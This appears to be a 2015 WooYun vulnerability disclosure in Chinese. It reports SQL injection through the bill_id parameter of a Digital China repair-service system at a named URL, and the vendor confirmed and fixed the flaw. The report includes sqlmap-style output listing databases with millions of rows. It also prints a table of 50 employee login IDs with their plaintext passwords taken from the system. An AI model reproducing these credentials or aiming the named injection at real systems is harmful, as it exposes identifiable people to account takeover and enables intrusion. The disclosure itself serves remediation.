当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140093

漏洞标题:神州数码某重要系统SQL注入(百万账户泄露/密码明文存储)

相关厂商:digitalchina.com

漏洞作者: 深度安全实验室

提交时间:2015-09-10 09:45

修复时间:2015-09-11 10:52

公开时间:2015-09-11 10:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-10: 细节已通知厂商并且等待厂商处理中
2015-09-10: 厂商已经确认,细节仅向厂商公开
2015-09-11: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

rt

详细说明:

神州数码维修服务管理系统 如下链接存在sql注入,其中,bill_id参数有问题

http://servexpress.digitalchina.com/sms/DELL/wurnew/snap_sdar.asp?bill_id=D506184191

1.png

漏洞证明:

发现11个库

2.png


以U_DELL库为例,发现千万规模的表

back-end DBMS: Oracle
Database: U_DELL
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| OPT_LIST              | 22807944 |
| SER_RC_END            | 9989419 |
| EDI_DETAIL            | 5221963 |
| EDI_INVENTORY_TEMP_3S | 2814074 |
| REQ_LIST              | 1770091 |
| SER_BACK_CLASS        | 1703605 |
| REQ_INF               | 1614940 |
| BILL_INDEX            | 1606424 |
| T142_20_C             | 1592256 |
| SER_INDEX             | 1513885 |
| BILL_LIST_BAK         | 1459097 |
| SER_INF_BAK           | 1404593 |
| PART_LIST_BAK         | 1293696 |
| RMA_PICK_UP_BAK       | 1138502 |


以ERS库为例,发现百万规模的表

Database: ERS
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| LOGIN_LIST          | 4141728 |
| CUST                | 2718576 |
| PERSON_INF          | 2392669 |
| CCS_DELL_RESULT     | 1154633 |
| MAIL                | 1056855 |
| CCS_CASE            | 854095  |
| ORGNIZATION_PROFILE | 316973  |
| CCS_AD_BILL         | 260222  |
| CCS_AD_OPT_LOG      | 116561  |
| DAY_LIST            | 10000   |


泄露的账户信息,包括:用户名、密码等,密码竟然是明文存储,我也是醉了

Database: ERS
Table: DIC_USERS
[50 entries]
+---------+-------------+--------------+-----+-------------+----------------------+
| USER_ID | LOGIN_ID    | PASSWORD     | M1  | M2          | LAST_UPDATE_PWD_DATE |
+---------+-------------+--------------+-----+-------------+----------------------+
| 10140   | dc-fucx1    | zzzzzz1      | nec | dc-fucx1    | 2015-04-01 15:56:26  |
| 10141   | xa-songzy   | song123      | nec | xa-songzy   | 2009-10-09 09:38:18  |
| 10142   | bj-zhaoyan  | 885669       | nec | bj-zhaoyan  | 2001-01-01 00:00:00  |
| 10144   | dc-lyq      | 1qa23z       | nec | dc-lyq      | 2012-03-12 11:48:43  |
| 10145   | sh-kl       | 64661559kl   | nec | sh-kl       | 2011-09-07 18:27:12  |
| 10146   | bj2-yzy     | yzy          | nec | bj2-yzy     | 2001-01-01 00:00:00  |
| 10147   | wh-lvyp     | lyp811214    | nec | wh-lvyp     | 2008-12-15 10:10:58  |
| 10148   | sy-huanghai | huanghai     | nec | sy-huanghai | 2001-01-01 00:00:00  |
| 10149   | bj-libr     | libr         | nec | bj-libr     | 2001-01-01 00:00:00  |
| 10150   | bj-liujd    | 12345        | nec | bj-liujd    | 2001-01-01 00:00:00  |
| 10151   | xa-liwq     | 123456l      | nec | xa-liwq     | 2015-04-01 14:24:12  |
| 10152   | dc-syl      | enter        | nec | dc-syl      | 2001-01-01 00:00:00  |
| 10153   | bj-lj       | lijiae1      | nec | bj-lj       | 2009-10-09 10:58:50  |
| 10154   | bj-fuqh     | fuqh         | nec | bj-fuqh     | 2001-01-01 00:00:00  |
| 10155   | dc-zb       | zhaobin7879  | nec | dc-zb       | 2014-06-16 17:59:19  |
| 10156   | nj-zt       | nj           | nec | nj-zt       | 2001-01-01 00:00:00  |
| 10157   | bj-fanyj    | blfiqpgf     | nec | bj-fanyj    | 2001-01-01 00:00:00  |
| 10158   | bj-jl       | akuma820809  | nec | bj-jl       | 2001-01-01 00:00:00  |
| 10159   | bj2-jl      | akuma820809  | nec | bj2-jl      | 2001-01-01 00:00:00  |
| 10160   | bj2-mn      | maning122802 | nec | bj2-mn      | 2013-02-21 14:29:31  |
| 10161   | bj2-fyj     | 198000       | nec | bj2-fyj     | 2001-01-01 00:00:00  |
| 10162   | bj-xzm      | xzm          | nec | bj-xzm      | 2001-01-01 00:00:00  |
| 10163   | sh-zxl      | zxl321       | nec | sh-zxl      | 2015-04-03 14:39:05  |
| 10164   | bj-zhy      | zhy123       | nec | bj-zhy      | 2013-07-08 09:16:43  |
| 10165   | dc-cc       | dccc800      | nec | dc-cc       | 2015-06-26 09:25:13  |
| 10166   | bj-lbw      | 5211314      | nec | bj-lbw      | 2001-01-01 00:00:00  |
| 10167   | sh-lx       | anad0728     | nec | sh-lx       | 2015-05-08 18:08:50  |
| 10168   | dc-sqj      | 13301353150  | nec | dc-sqj      | 2001-01-01 00:00:00  |
| 10170   | dc-wwj      | 0606wwj      | nec | dc-wwj      | 2011-09-14 09:42:55  |
| 10171   | dc-wg       | newpass123x  | nec | dc-wg       | 2013-09-23 15:13:00  |
| 10173   | bj-hxq      | hxq000       | nec | bj-hxq      | 2015-01-23 09:20:29  |
| 10175   | sh-zsy      | tos901       | nec | sh-zsy      | 2014-05-13 16:15:57  |
| 10176   | wh-lly      | asd321       | nec | wh-lly      | 2014-03-28 12:35:06  |
| 10177   | sz-tzy      | NONE         | nec | sz-tzy      | 2001-01-01 00:00:00  |
| 10178   | bj-ty       | ty19710401   | nec | bj-ty       | 2008-12-31 15:16:16  |
| 10179   | bj-ln       | 1234         | nec | bj-ln       | 2001-01-01 00:00:00  |
| 10180   | bj-mn       | 19810802     | nec | bj-mn       | 2001-01-01 00:00:00  |
| 10181   | bj-wl       | 741852pp     | nec | bj-wl       | 2013-07-04 18:44:50  |
| 10182   | bj-jxl      | ooo          | nec | bj-jxl      | 2001-01-01 00:00:00  |
| 10183   | dc-nw       | 781029       | nec | dc-nw       | 2001-01-01 00:00:00  |
| 10184   | jn-zl       | 123asd       | nec | jn-zl       | 2009-10-16 15:38:12  |
| 10185   | nj-zxy      | zxy          | nec | nj-zxy      | 2012-07-05 14:19:53  |
| 10186   | dc-zhuhj    | aaa111       | nec | dc-zhuhj    | 2014-06-06 11:21:41  |
| 10187   | dc-niewei   | 456          | nec | dc-niewei   | 2001-01-01 00:00:00  |
| 10188   | nec-jzq     | nec12345     | nec | nec-jzq     | 2009-01-05 13:57:29  |
| 10189   | 10189       | lizhb2009    | nec | cd-zhouzh   | 2010-09-21 18:17:24  |
| 10190   | nec-zq      | nec111       | nec | nec-zq      | 2009-03-12 17:55:26  |
| 10191   | nec-zgyj    | 11111        | nec | nec-zgyj    | 2001-01-01 00:00:00  |
| 10192   | nec-hy      | 12345678     | nec | nec-hy      | 2001-01-01 00:00:00  |
| 10193   | dc-yangqian | 42yangqian   | nec | dc-yangqian | 2014-07-15 11:35:09  |
+---------+-------------+--------------+-----+-------------+----------------------+


修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-09-10 11:05

厂商回复:

尽快处理!

最新状态:

2015-09-11:已修复

漏洞评价:

评论

  1. 2015-09-10 11:23 | 有归于无 ( 实习白帽子 | Rank:84 漏洞数:14 | 有归于无)

    这是哪个系统啊